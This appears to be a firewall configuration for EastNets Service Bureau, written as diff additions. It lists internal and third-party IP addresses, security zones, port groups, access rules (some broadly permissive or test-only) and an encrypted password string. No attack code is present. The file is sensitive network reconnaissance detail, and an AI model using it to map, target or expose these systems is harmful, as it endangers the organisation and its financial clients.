+name 172.28.1.68 IDXDUS33-ws1
+name 172.28.1.69 IDXDUS33-ws2
+name 172.28.1.70 IDXDUS33-ws3
+name 10.100.210.0 unirisx-pharos-nw description Unirisx-Pharos Dial-in IP Pool
+name 192.168.209.52 ensbusl3
+name 192.168.209.50 ensbusl1
+name 192.168.209.51 ensbusl2
+name 192.168.208.0 ensb-dxb-mgmt-nw
+name 172.28.1.133 RBBCUS6L-ws1
+name 172.28.1.134 RBBCUS6L-ws2
+name 192.168.214.100 finmex-srv1 description Finmex Portal Server1
+name 10.100.215.0 finmex-mgmt-nw description finmex-mgmt-pool
+name 172.28.1.193 GPSXUS55-loopback
+name 172.28.1.194 GPSXUS55-mgmt1
+name 172.28.1.195 GPSXUS55-mgmt2
+name 172.28.1.196 GPSXUS55-nsrp
+name 172.28.1.198 GPSXUS55-ws1
+name 172.28.1.199 GPSXUS55-ws2
+name 172.28.1.200 GPSXUS55-ws3
+name 172.28.1.201 GPSXUS55-ws4
+name 172.28.1.202 GPSXUS55-ws5
+name 172.28.1.135 RBBCUS6L-ws3
+name 172.28.1.136 RBBCUS6L-ws4
+name 172.28.2.129 CAGPBMHM-LB
+name 192.168.209.31 CAGP-SRV1
+name 192.168.209.32 CAGP-SRV2
+name 192.168.226.0 ensb-jo-nw
+name 172.28.2.130 CAGPBMHM-MGMT-VPN1-OLD
+name 172.28.2.132 CAGPBMHM-NSRP-OLD
+name 10.149.10.0 nw-sslvpn-nw description ENSBNW SSLVPN IP
+name 192.168.202.25 sagfin1
+name 192.168.202.26 sagfin2
+name 192.168.202.22 sagsns1
+name 192.168.202.23 sagsns2
+name 192.168.202.21 sagtest1
+name 206.201.131.9 UNIRISX-KEYSRV
+name 192.168.214.105 enMORE-srvr1
+name 4.3.2.0 Vitname-NW
+name 192.168.202.245 enFTP1
+name 193.43.238.250 BICs-HomeSend-Test
+name 193.43.238.249 BICs-HomeSend-Prod
+name 192.168.214.51 SL1
+name 192.168.202.30 swp-nlb
+name 192.168.202.28 swp-srv1
+name 192.168.202.29 swp-srv2
+name 192.168.214.106 enMORE-srvr2
+name 10.100.220.0 cs-support-nw
+name 192.168.214.107 enMORE-srvr3
+name 192.168.214.108 enMORE-srvr4
+name 192.168.211.230 en.MoreWebSRVR1 description en.More Web Server 1
+name 84.45.85.251 RemitONE-Srvr1 description RemitONE Public IP 1
+name 84.45.85.253 RemitONE-Srvr2 description RemitONE Public IP 2
+name 84.45.85.222 RemitONE-Test_Srvr1 description RemitONE Public IP 3
+name 84.45.85.199 RemitONE-Srvr3
+name 84.45.85.195 RemitONE-Srvr4
+name 192.168.202.101 ensbdrsa2
+dns-guard
+!
+interface Ethernet0
+ nameif clients
+ security-level 10
+ ip address 192.168.211.1 255.255.255.0 
+!
+interface Ethernet1
+ nameif host
+ security-level 70
+ ip address 192.168.209.1 255.255.255.0 
+!
+interface Ethernet2
+ nameif sag
+ security-level 80
+ ip address 192.168.202.4 255.255.255.0 
+!
+interface Ethernet3
+ description unirisx zone
+ nameif unirisx
+ security-level 30
+ ip address 192.168.213.1 255.255.255.0 
+!
+interface Ethernet4
+ description mgmt zone
+ nameif mgmt
+ security-level 50
+ ip address 192.168.208.4 255.255.255.0 
+!
+interface Ethernet5
+ no nameif
+ no security-level
+ no ip address
+!
+interface Ethernet5.1
+ description Finemx Portal Interface
+ vlan 214
+ nameif finmex
+ security-level 20
+ ip address 192.168.214.1 255.255.255.0 
+!
+passwd Ro5XpDeSuehPBEdi encrypted
+banner login EastNets Service Bureau
+banner login NOTICE TO USERS
+banner login This computer is a property of EastNets (R). Any or all use of this system is governed by the Security Policies of EastNets Service Bureau (ENSB).
+banner login Any or all uses of this system, and all files on this system may be monitored, recorded, audited, or inspected  at the discretion of EastNets Management.
+banner login Unauthorized or improper use of this system may result in administrative disciplinary action and civil and criminal penalties. By continuing to use this system you indicate your awareness of and consent to these terms and conditions of use. LOG OFF IMMEDIATELY if you do not agree to the conditions stated in this warning.
+banner login Please contact ENSB Infrastructure Team to obtain a copy of the Security Policy or visit ENSB portal at http://entranet.eastnets.com/sites/ENSB/.
+ftp mode passive
+dns domain-lookup clients
+dns domain-lookup host
+dns domain-lookup sag
+dns domain-lookup unirisx
+dns domain-lookup mgmt
+dns domain-lookup finmex
+dns server-group DefaultDNS
+ domain-name sag
+object-group network sag-servers-prod
+ network-object host sagsns1
+ network-object host sagfin2
+object-group network ensb-vpns-group
+ network-object vpn1-int 255.255.255.255
+ network-object vpn2-int 255.255.255.255
+ network-object vpn1-2-nsrp 255.255.255.255
+object-group service msih-ports-udp udp
+ port-object range 9000 9059
+ port-object range 48200 48200
+ port-object range 48100 48105
+ port-object range 135 135
+ port-object range 48002 48009
+ port-object range 6500 6501
+ port-object range 1029 1029
+object-group service msih-ports-udp-casmf udp
+ port-object range 5101 5105
+ port-object range 5206 5207
+object-group service swift-dns-port udp
+ port-object range domain domain
+object-group service symantec-av udp
+ port-object range 38293 38293
+ port-object range 2967 2967
+object-group service FMSIH-OUT-TCP tcp
+ port-object range 9100 9106
+ port-object range 6500 6501
+object-group service FMSIH-OUT-TCP-CASMF tcp
+ group-object FMSIH-OUT-TCP
+ port-object range 5206 5207
+ port-object range 5101 5105
+object-group service FMSIH-PRINT-TCP tcp
+ port-object range 9100 9106
+object-group service msih-ports-tcp tcp
+ port-object range 9000 9059
+ port-object range 48200 48200
+ port-object range 48100 48105
+ port-object range 135 135
+ port-object range 48009 48009
+ port-object range 6500 6501
+ port-object range 1029 1029
+ port-object eq ssh
+object-group service msih-ports-tcp-casmf tcp
+ group-object msih-ports-tcp
+ port-object range 5206 5207
+ port-object range 5101 5105
+object-group service snmp tcp-udp
+ port-object range 161 162
+object-group service doubletake tcp-udp
+ port-object range 1105 1106
+ port-object range 1100 1100
+object-group service msih-ports tcp-udp
+ port-object range 48200 48200
+ port-object range 48100 48105
+ port-object range 135 135
+ port-object range 48009 48009
+ port-object range 6500 6501
+ port-object range 9000 9049
+ port-object range 1029 1029
+object-group service shared-ports tcp
+ port-object range 445 445
+ port-object range netbios-ssn netbios-ssn
+ port-object range 137 137
+ port-object eq 138
+object-group service swift-49168-9 tcp
+ port-object range 49168 49169
+object-group service swift-cara-port tcp
+ port-object range 709 709
+object-group service swift-dialup-port tcp
+ port-object eq www
+object-group service swift-direcotry-ports tcp
+ port-object range 1400 1409
+ port-object range 1600 1609
+ port-object range 1100 1109
+ port-object range ldap ldap
+ port-object range 1300 1309
+ port-object range 1500 1509
+ port-object range 1200 1209
+object-group service swift-myswift-webserver-port tcp
+ port-object range https https
+object-group service swift-rvs-port tcp
+ port-object range 49170 49170
+object-group service swift-secrets-webserver-port tcp
+ port-object range 49172 49172
+object-group service swift-switch-ports tcp
+ port-object range 50153 50190
+ port-object range 52100 52399
+ port-object range 49500 49510
+ port-object range 50200 50806
+object-group service swift-web-connector-ports tcp
+ port-object eq www
+ port-object range 49171 49171
+object-group service vnc-port tcp
+ port-object range 5800 5800
+ port-object range 5900 5900
+object-group network sag-srv-test
+ network-object sagsns1 255.255.255.255
+object-group network sag-servers-prod_ref
+ network-object 192.168.246.20 255.255.255.255
+ network-object 192.168.246.25 255.255.255.255
+ network-object 192.168.209.25 255.255.255.255
+ network-object 192.168.209.20 255.255.255.255
+object-group network ensb-dxb-nw
+ network-object ensb-dxb-nw 255.255.255.0
+object-group service web-ports tcp
+ port-object eq www
+ port-object eq https
+object-group network sag-servers-prod1
+ network-object sag-srv2 255.255.255.255
+ network-object sagfin1 255.255.255.255
+object-group network sag-servers-prod_ref_1
+ network-object 192.168.211.25 255.255.255.255
+ network-object 192.168.211.20 255.255.255.255
+object-group network FEBKUS6L-ws-nw
+ network-object FEBKUS6L-LA-ws2 255.255.255.255
+ network-object FEBKUS6L-LA-ws3 255.255.255.255
+ network-object FEBKUS6L-LA-ws4 255.255.255.255
+ network-object FEBKUS6L-LA-ws5 255.255.255.255
+ network-object FEBKUS6L-LA-ws6 255.255.255.255
+ network-object FEBKUS6L-LA-ws7 255.255.255.255
+ network-object FEBKUS6L-IR-ws2 255.255.255.255
+ network-object FEBKUS6L-IR-ws3 255.255.255.255
+ network-object FEBKUS6L-IR-ws4 255.255.255.255
+ network-object FEBKUS6L-IR-ws5 255.255.255.255
+ network-object FEBKUS6L-IR-ws6 255.255.255.255
+ network-object FEBKUS6L-IR-ws7 255.255.255.255
+ network-object FEBKUS6L-LA-ws1 255.255.255.255
+ network-object host FEBKUS6L-IR-ws1
+object-group network sharedsaa-saa-group
+ network-object host host-srv1
+ network-object host host-srv2
+ network-object host host-srv3
+object-group network ensb-mgmt-nw
+ network-object ensb-mgmt-nw 255.255.255.0
+ network-object ensb-dxb-nw 255.255.255.0
+ network-object ensb-dxb-mgmt-nw 255.255.255.0
+object-group protocol TCPUDP
+ protocol-object udp
+ protocol-object tcp
+object-group protocol DM_INLINE_PROTOCOL_2
+ protocol-object udp
+ protocol-object tcp
+object-group network ensb-us-nw
+ network-object ensb-us-nw 255.255.255.0
+object-group network unirisx-srv-group
+ network-object host 192.168.211.201
+ network-object host 192.168.211.202
+ network-object host 192.168.211.203
+object-group network unirisx-mgmt-group
+ network-object unirisx-mgmt-nw 255.255.255.0
+object-group service RDP tcp
+ port-object eq 3389
+object-group network IDXDUS33-nw
+ network-object host IDXDUS33-ws1
+ network-object host IDXDUS33-ws2
+ network-object host IDXDUS33-ws3
+object-group network unirisx-pharos-group
+ network-object unirisx-pharos-nw 255.255.255.0
+object-group network DM_INLINE_NETWORK_1
+ network-object host ensbusl1
+ network-object host ensbusl2
+ network-object host ensbusl3
+ network-object host CAGP-SRV1
+ network-object host CAGP-SRV2
+object-group network DM_INLINE_NETWORK_2
+ network-object host ensbusl1
+ network-object host ensbusl2
+ network-object host ensbusl3
+ network-object host CAGP-SRV1
+ network-object host CAGP-SRV2
+object-group network DM_INLINE_NETWORK_3
+ network-object host unirisx-srv1
+ network-object host unirisx-srv2
+ network-object host unirisx-srv3
+object-group network DM_INLINE_NETWORK_4
+ network-object host unirisx-srv1
+ network-object host unirisx-srv2
+ network-object host unirisx-srv3
+object-group network RBBCUS6L-ws-nw
+ network-object host RBBCUS6L-ws1
+ network-object host RBBCUS6L-ws2
+ network-object host RBBCUS6L-ws3
+ network-object host RBBCUS6L-ws4
+object-group network finmex-mgmt-group
+ network-object finmex-mgmt-nw 255.255.255.0
+object-group service DM_INLINE_SERVICE_1
+ service-object icmp 
+ service-object tcp eq smtp 
+object-group network GPSXUS55-nw
+ network-object host GPSXUS55-loopback
+ network-object host GPSXUS55-mgmt1
+ network-object host GPSXUS55-mgmt2
+ network-object host GPSXUS55-nsrp
+ network-object host GPSXUS55-ws1
+ network-object host GPSXUS55-ws2
+ network-object host GPSXUS55-ws3
+ network-object host GPSXUS55-ws4
+ network-object host GPSXUS55-ws5
+object-group network CAGPBMHM-nw
+ network-object host CAGPBMHM-NSRP-OLD
+ network-object host 172.28.2.133
+ network-object host 172.28.2.134
+ network-object host 172.28.2.135
+ network-object host 172.28.2.136
+ network-object host 172.28.2.137
+ network-object host 172.28.2.138
+ network-object host 172.28.2.139
+ network-object host 172.28.2.140
+ network-object host 172.28.2.141
+ network-object host 172.28.2.142
+ network-object host 172.28.2.143
+ network-object host 172.28.2.144
+ network-object host 172.28.2.145
+ network-object host CAGPBMHM-LB
+ network-object host CAGPBMHM-MGMT-VPN1-OLD
+ network-object host 172.28.2.146
+ network-object host 172.28.2.147
+ network-object host 172.28.2.148
+ network-object host 172.28.2.149
+ network-object host 172.28.2.150
+ network-object host 172.28.2.151
+ network-object host 172.28.2.152
+ network-object host 172.28.2.153
+ network-object host 172.28.2.154
+ network-object host 172.28.2.157
+ network-object host 172.28.2.158
+ network-object host 172.28.2.159
+ network-object host 172.28.2.160
+ network-object host 172.28.2.161
+ network-object host 172.28.2.162
+ network-object host 172.28.2.163
+ network-object host 172.28.2.164
+ network-object host 172.28.2.165
+ network-object host 172.28.2.166
+ network-object host 172.28.2.167
+ network-object host 172.28.2.168
+ network-object host 172.28.2.169
+ network-object host 172.28.2.170
+ network-object host 172.28.2.171
+ network-object host 172.28.2.173
+ network-object host 172.28.2.174
+ network-object host 172.28.2.172
+ network-object host 172.28.2.175
+ network-object host 172.28.2.176
+ network-object host 172.28.2.177
+object-group network CAGP-SRV-GROUP
+ network-object host CAGP-SRV1
+ network-object host CAGP-SRV2
+object-group service sidestation tcp
+ port-object eq 8401
+object-group service sql tcp
+ port-object eq 1433
+object-group service DM_INLINE_TCP_1 tcp
+ group-object msih-ports
+ port-object eq ftp
+ port-object eq ssh
+ group-object sidestation
+ group-object sql
+object-group network CAPG-SRV-GROUP-NAT
+ network-object host 192.168.211.31
+ network-object host 192.168.211.32
+object-group service Unirisx-Keysrv tcp
+ description keyserver.hostidp.com on TCP port 18021
+ port-object eq 18201
+object-group network DM_INLINE_NETWORK_5
+ group-object sag-servers-prod
+ group-object sag-servers-prod1
+object-group network en.More-srvr
+ network-object host enMORE-srvr1
+ network-object host enMORE-srvr2
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network en.More-srvr_ref
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+ network-object host 192.168.211.107
+ network-object host 192.168.211.108
+ network-object host enMORE-srvr4
+ network-object host enMORE-srvr3
+object-group network CAGPBMHM-NW-DR
+ network-object 172.28.2.192 255.255.255.192
+object-group service DM_INLINE_TCP_3 tcp
+ group-object msih-ports
+ group-object sidestation
+ group-object sql
+ port-object eq ftp
+ port-object eq ssh
+object-group network en.More_Customers
+ network-object Vitname-NW 255.255.255.0
+object-group service DM_INLINE_TCP_2 tcp
+ port-object eq 4443
+ port-object eq 7777
+ port-object eq 8080
+ port-object eq 8081
+ port-object eq www
+ port-object eq https
+ port-object eq ftp
+ port-object eq ftp-data
+object-group service DM_INLINE_TCP_4 tcp
+ port-object eq 4443
+ port-object eq 7777
+ port-object eq 8080
+ port-object eq 8081
+ port-object eq www
+ port-object eq https
+ port-object eq ftp
+ port-object eq ftp-data
+object-group service DM_INLINE_TCP_5 tcp
+ port-object eq ftp
+ port-object eq ftp-data
+ port-object eq ssh
+object-group service shared-ports-udp udp
+ port-object eq 139
+ port-object eq 445
+ port-object eq netbios-dgm
+ port-object eq netbios-ns
+object-group service DM_INLINE_TCP_7 tcp
+ port-object eq ftp
+ port-object eq ftp-data
+ port-object eq ssh
+object-group network ftp-srv_ref-clients
+ network-object host 192.168.211.115
+object-group network ftp-srv_ref-finmex
+ network-object host 192.168.214.245
+object-group network DM_INLINE_NETWORK_6
+ network-object host BICs-HomeSend-Prod
+ network-object host BICs-HomeSend-Test
+object-group network DM_INLINE_NETWORK_7
+ network-object host BICs-HomeSend-Prod
+ network-object host BICs-HomeSend-Test
+object-group service DM_INLINE_TCP_6 tcp
+ port-object eq ftp
+ port-object eq ftp-data
+ port-object eq ssh
+object-group service DM_INLINE_SERVICE_2
+ service-object tcp eq www 
+ service-object tcp eq https 
+ service-object tcp-udp eq domain 
+object-group service DM_INLINE_TCP_8 tcp
+ port-object eq 3389
+ port-object eq www
+ port-object eq https
+object-group service DM_INLINE_TCP_9 tcp
+ port-object eq www
+ port-object eq https
+object-group service DM_INLINE_TCP_10 tcp
+ port-object eq ftp
+ port-object eq ftp-data
+object-group network swp-srvrs
+ network-object host swp-srv1
+ network-object host swp-srv2
+ network-object host swp-nlb
+object-group service DM_INLINE_SERVICE_3
+ service-object icmp 
+ service-object tcp eq 48600 
+ service-object tcp eq https 
+object-group network DM_INLINE_NETWORK_8
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+ network-object host enMORE-srvr4
+ network-object host enMORE-srvr3
+object-group network DM_INLINE_NETWORK_9
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_10
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_11
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group service DM_INLINE_TCP_11 tcp
+ port-object eq 3389
+ port-object eq www
+ port-object eq https
+object-group service mgmt-bkup-tcp tcp
+ port-object eq 445
+ port-object range 137 netbios-ssn
+ port-object eq 2967
+ port-object range 10000 10025
+ port-object range 10250 10275
+object-group service mgmt-bkup-udp udp
+ port-object eq 445
+ port-object range netbios-ns 139
+ port-object eq 2967
+ port-object eq 38293
+object-group network DM_INLINE_NETWORK_12
+ network-object host enMORE-srvr1
+ network-object host enMORE-srvr2
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_13
+ network-object host enMORE-srvr1
+ network-object host enMORE-srvr3
+object-group network DM_INLINE_NETWORK_14
+ network-object host enMORE-srvr2
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_15
+ network-object host enMORE-srvr1
+ network-object host enMORE-srvr3
+object-group network DM_INLINE_NETWORK_16
+ network-object host enMORE-srvr2
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_17
+ network-object host enMORE-srvr1
+ network-object host enMORE-srvr3
+object-group network DM_INLINE_NETWORK_18
+ network-object host enMORE-srvr2
+ network-object host enMORE-srvr4
+object-group service DM_INLINE_SERVICE_4
+ service-object tcp eq 8401 
+ service-object udp eq 8401 
+object-group network en.More_Web_Servers
+ network-object host en.MoreWebSRVR1
+object-group network DM_INLINE_NETWORK_19
+ group-object en.More-srvr
+ group-object en.More-srvr_ref
+object-group network DM_INLINE_NETWORK_20
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group service ReportingSvc tcp
+ port-object eq 1111
+object-group service DM_INLINE_SERVICE_5
+ service-object tcp eq 135 
+ service-object tcp eq 137 
+ service-object tcp eq 138 
+ service-object tcp eq 1433 
+ service-object tcp eq 1434 
+ service-object tcp eq ftp 
+ service-object udp eq 135 
+ service-object tcp range 5000 5100 
+ service-object tcp eq 3372 
+ service-object tcp eq 445 
+ service-object udp eq 139 
+ service-object udp eq 1434 
+ service-object tcp eq 3389 
+ service-object tcp eq 1111 
+object-group service DM_INLINE_SERVICE_6
+ service-object tcp eq 1111 
+ service-object tcp eq 135 
+ service-object tcp eq 137 
+ service-object tcp eq 138 
+ service-object tcp range 5000 5100 
+ service-object tcp eq https 
+ service-object tcp eq ssh 
+ service-object udp eq 135 
+ service-object tcp eq 1433 
+ service-object tcp eq 1434 
+ service-object tcp eq 3372 
+ service-object tcp eq 445 
+ service-object udp eq 139 
+ service-object udp eq 1434 
+ service-object tcp eq 3389 
+object-group network RemitONE-Srvrs
+ network-object host RemitONE-Test_Srvr1
+ network-object host RemitONE-Srvr1
+ network-object host RemitONE-Srvr2
+ network-object host RemitONE-Srvr3
+object-group network DM_INLINE_NETWORK_21
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_22
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_23
+ network-object host 192.168.206.188
+ network-object host 192.168.206.189
+object-group network DM_INLINE_NETWORK_24
+ network-object host 192.168.214.10
+ network-object host 192.168.214.11
+object-group network DM_INLINE_NETWORK_25
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_26
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group service DM_INLINE_TCP_12 tcp
+ port-object eq www
+ port-object eq https
+object-group network DM_INLINE_NETWORK_27
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+object-group network DM_INLINE_NETWORK_28
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+object-group service DM_INLINE_TCP_13 tcp
+ port-object eq www
+ port-object eq https
+access-list clients_access_in remark Allow en.More Level 3 MGMT Group to access en.More APP Servers
+access-list clients_access_in extended permit tcp 10.100.150.0 255.255.255.240 object-group DM_INLINE_NETWORK_27 object-group DM_INLINE_TCP_13 
+access-list clients_access_in remark Deny any traffic from en.More Level 3 MGMT Group
+access-list clients_access_in extended deny ip 10.100.150.0 255.255.255.240 object-group DM_INLINE_NETWORK_28 
+access-list clients_access_in remark Allow en.More Level 3 MGMT Group to access en.More Servers
+access-list clients_access_in extended permit tcp 10.100.150.0 255.255.255.240 object-group DM_INLINE_NETWORK_25 object-group DM_INLINE_TCP_12 
+access-list clients_access_in remark Deny any traffic from en.More Level 3 MGMT Group
+access-list clients_access_in extended deny ip 10.100.150.0 255.255.255.240 object-group DM_INLINE_NETWORK_26 
+access-list clients_access_in remark Allow HTTPS from RemitONE to en.More-srvr4
+access-list clients_access_in extended permit tcp object-group RemitONE-Srvrs object-group DM_INLINE_NETWORK_21 eq https 
+access-list clients_access_in remark Deny any traffic from RemitONE to en.More-srvr4 for Security
+access-list clients_access_in extended deny ip object-group RemitONE-Srvrs object-group DM_INLINE_NETWORK_22 
+access-list clients_access_in extended permit icmp any any 
+access-list clients_access_in extended permit tcp any object-group sag-servers-prod eq 48002 
+access-list clients_access_in extended permit tcp any object-group sag-servers-prod eq 48003 
+access-list clients_access_in extended permit tcp object-group en.More_Customers object-group en.More-srvr_ref eq www 
+access-list clients_access_in extended permit tcp object-group DM_INLINE_NETWORK_7 object-group en.More-srvr_ref object-group DM_INLINE_TCP_2 
+access-list clients_access_in extended permit tcp object-group en.More_Customers object-group ftp-srv_ref-clients object-group DM_INLINE_TCP_7 
+access-list clients_access_in extended permit tcp any object-group ftp-srv_ref-clients object-group DM_INLINE_TCP_6 
+access-list clients_access_in extended permit object-group DM_INLINE_PROTOCOL_2 object-group FEBKUS6L-ws-nw object-group sharedsaa-saa-group object-group msih-ports 
+access-list clients_access_in extended permit object-group DM_INLINE_PROTOCOL_2 object-group GPSXUS55-nw object-group sharedsaa-saa-group object-group msih-ports 
+access-list clients_access_in extended permit object-group DM_INLINE_PROTOCOL_2 object-group IDXDUS33-nw object-group sharedsaa-saa-group object-group msih-ports 
+access-list clients_access_in extended permit object-group DM_INLINE_PROTOCOL_2 object-group RBBCUS6L-ws-nw object-group sharedsaa-saa-group object-group msih-ports 
+access-list clients_access_in extended permit object-group DM_INLINE_PROTOCOL_2 object-group CAGPBMHM-nw object-group sharedsaa-saa-group object-group msih-ports 
+access-list clients_access_in extended permit object-group DM_INLINE_PROTOCOL_2 host ensb-us-nw object-group sharedsaa-saa-group object-group msih-ports 
+access-list clients_access_in extended permit tcp ensb-us-nw 255.255.255.0 object-group sharedsaa-saa-group eq 3389 
+access-list clients_access_in extended permit tcp ensb-mgmt-nw 255.255.255.0 object-group sharedsaa-saa-group eq 3389 
+access-list clients_access_in remark disconnect
+access-list clients_access_in extended permit tcp unirisx-mgmt-nw 255.255.255.0 object-group unirisx-srv-group eq 3389 inactive 
+access-list clients_access_in extended permit ip object-group FEBKUS6L-ws-nw ensb-dxb-nw 255.255.255.0 inactive 
+access-list clients_access_in remark USA DC access to DXB DC
+access-list clients_access_in extended permit ip ensb-us-nw 255.255.255.0 ensb-dxb-nw 255.255.255.0 
+access-list clients_access_in remark Unirisx Customer - disconnect
+access-list clients_access_in extended permit tcp any object-group unirisx-srv-group object-group web-ports inactive 
+access-list clients_access_in remark Unirisx Customer - disconnect
+access-list clients_access_in extended permit tcp any object-group unirisx-srv-group eq ftp inactive 
+access-list clients_access_in remark Unirisx Customer - disconnect
+access-list clients_access_in extended permit icmp any object-group unirisx-srv-group inactive 
+access-list clients_access_in remark Unirisx Keysrv - disconnect
+access-list clients_access_in extended permit tcp host UNIRISX-KEYSRV object-group unirisx-srv-group object-group Unirisx-Keysrv inactive 
+access-list clients_access_in remark ENSB mgmt
+access-list clients_access_in extended permit ip ensb-mgmt-nw 255.255.255.0 any 
+access-list clients_access_in remark disconnect
+access-list clients_access_in extended permit tcp unirisx-pharos-nw 255.255.255.0 host 192.168.211.203 eq 3389 inactive 
+access-list clients_access_in extended permit tcp finmex-mgmt-nw 255.255.255.0 host 192.168.211.100 eq 3389 
+access-list clients_access_in extended permit tcp finmex-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_8 object-group DM_INLINE_TCP_8 
+access-list clients_access_in remark Access List between en.More Web Server and en.More Servers
+access-list clients_access_in extended permit object-group DM_INLINE_SERVICE_5 object-group en.More_Web_Servers object-group DM_INLINE_NETWORK_19 
+access-list clients_access_in remark Access List between en.More Web Server and en.More Servers (reporting Service) (AD-06JUN2012)
+access-list clients_access_in extended permit tcp object-group en.More_Web_Servers object-group DM_INLINE_NETWORK_20 object-group ReportingSvc 
+access-list clients_access_in remark Publish enMore Internet (requested by HM). AD.
+access-list clients_access_in extended permit tcp any object-group DM_INLINE_NETWORK_9 object-group DM_INLINE_TCP_9 
+access-list clients_access_in remark Publish enMore ftp Internet. To be enabled when needed only. AD.
+access-list clients_access_in extended permit tcp any object-group DM_INLINE_NETWORK_10 object-group DM_INLINE_TCP_10 
+access-list clients_access_in remark FOR TESTING PURPOSES ONLY. DISABLE AFTER TESTING
+access-list clients_access_in extended permit tcp any object-group DM_INLINE_NETWORK_11 object-group DM_INLINE_TCP_11 inactive 
+access-list clients_access_in extended permit icmp any host 192.168.211.100 
+access-list clients_access_in extended permit tcp any host 192.168.211.100 object-group web-ports 
+access-list clients_access_in extended permit tcp any host 192.168.211.100 eq ftp 
+access-list clients_access_in extended permit tcp object-group CAGPBMHM-nw object-group CAPG-SRV-GROUP-NAT object-group DM_INLINE_TCP_1 
+access-list clients_access_in extended permit tcp object-group CAGPBMHM-NW-DR object-group CAPG-SRV-GROUP-NAT object-group DM_INLINE_TCP_3 
+access-list clients_access_in extended permit ip ensb-jo-nw 255.255.255.0 ensb-dxb-nw 255.255.255.0 
+access-list clients_access_in extended permit ip nw-sslvpn-nw 255.255.255.0 ensb-dxb-nw 255.255.255.0 
+access-list clients_access_in remark disabled April 1, 2013
+access-list clients_access_in extended permit tcp any any eq 30003 inactive 
+access-list clients_access_in remark disabled April 1, 2013
+access-list clients_access_in extended permit udp any any eq 30003 inactive 
+access-list clients_access_in extended permit udp any object-group en.More-srvr_ref eq nameserver 
+access-list clients_access_in extended permit object-group DM_INLINE_SERVICE_3 host 172.28.0.0 object-group swp-srvrs 
+access-list clients_access_in extended permit tcp cs-support-nw 255.255.255.0 host enMORE-srvr1 eq www 
+access-list clients_access_in extended permit tcp cs-support-nw 255.255.255.0 host enMORE-srvr1 eq https 
+access-list clients_access_in extended permit ip host en.MoreWebSRVR1 ensb-dxb-mgmt-nw 255.255.255.0 
+access-list clients_access_in extended permit icmp host en.MoreWebSRVR1 ensb-dxb-mgmt-nw 255.255.255.0 
+access-list sag_access_in extended permit icmp any object-group en.More-srvr 
+access-list sag_access_in extended permit ip any object-group en.More-srvr 
+access-list sag_access_in extended permit icmp any any 
+access-list sag_access_in extended permit tcp any any eq 3389 
+access-list sag_access_in extended permit ip any any 
+access-list swift_access_in extended permit ip any any 
+access-list Hosting extended permit object-group DM_INLINE_PROTOCOL_2 object-group CAGP-SRV-GROUP object-group CAGPBMHM-nw object-group msih-ports inactive 
+access-list Hosting extended permit icmp 192.168.209.0 255.255.255.0 ensb-us-nw 255.255.255.0 
+access-list Hosting extended permit tcp 192.168.209.0 255.255.255.0 ensb-us-nw 255.255.255.0 eq 3389 
+access-list Hosting extended permit icmp 192.168.209.0 255.255.255.0 any 
+access-list Hosting extended permit tcp 192.168.209.0 255.255.255.0 object-group sag-servers-prod eq 48002 
+access-list Hosting extended permit tcp 192.168.209.0 255.255.255.0 object-group sag-servers-prod eq 48003 
+access-list Hosting extended permit object-group TCPUDP object-group sharedsaa-saa-group object-group FEBKUS6L-ws-nw object-group msih-ports 
+access-list Hosting extended permit object-group DM_INLINE_PROTOCOL_2 object-group sharedsaa-saa-group object-group IDXDUS33-nw object-group msih-ports 
+access-list Hosting extended permit object-group DM_INLINE_PROTOCOL_2 object-group sharedsaa-saa-group object-group RBBCUS6L-ws-nw object-group msih-ports 
+access-list Hosting extended permit object-group DM_INLINE_PROTOCOL_2 object-group sharedsaa-saa-group object-group GPSXUS55-nw object-group msih-ports 
+access-list Hosting extended permit object-group DM_INLINE_PROTOCOL_2 object-group sharedsaa-saa-group object-group CAGPBMHM-nw object-group msih-ports 
+access-list Hosting extended permit tcp 192.168.209.0 255.255.255.0 any object-group FMSIH-PRINT-TCP 
+access-list Hosting extended permit ip 192.168.209.0 255.255.255.0 any log 
+access-list Hosting extended permit ip ensb-dxb-nw 255.255.255.0 ensb-jo-nw 255.255.255.0 
+access-list Hosting remark test only
+access-list Hosting extended permit ip any any inactive 
+access-list Hosting extended permit ip host 192.168.211.31 any inactive 
+access-list Hosting extended permit icmp host 192.168.211.31 any inactive 
+access-list Hosting extended permit ip 192.168.209.0 255.255.255.0 192.168.200.0 255.255.255.0 
+access-list Hosting extended permit icmp 192.168.209.0 255.255.255.0 192.168.200.0 255.255.255.0 
+access-list Hosting extended permit icmp any any 
+access-list unirisx_access_in remark keyserver.hostidp.com on TCP port 18021
+access-list unirisx_access_in extended permit tcp host unirisx-srv1 host UNIRISX-KEYSRV object-group Unirisx-Keysrv 
+access-list unirisx_access_in remark DNS for host. AD
+access-list unirisx_access_in extended permit udp host unirisx-srv1 any eq domain 
+access-list unirisx_access_in extended permit ip 192.168.213.0 255.255.255.0 any 
+access-list unirisx_access_in extended permit icmp 192.168.213.0 255.255.255.0 any 
+access-list mgmt_access_in extended permit icmp ensb-dxb-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_2 
+access-list mgmt_access_in extended permit ip ensb-dxb-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_1 
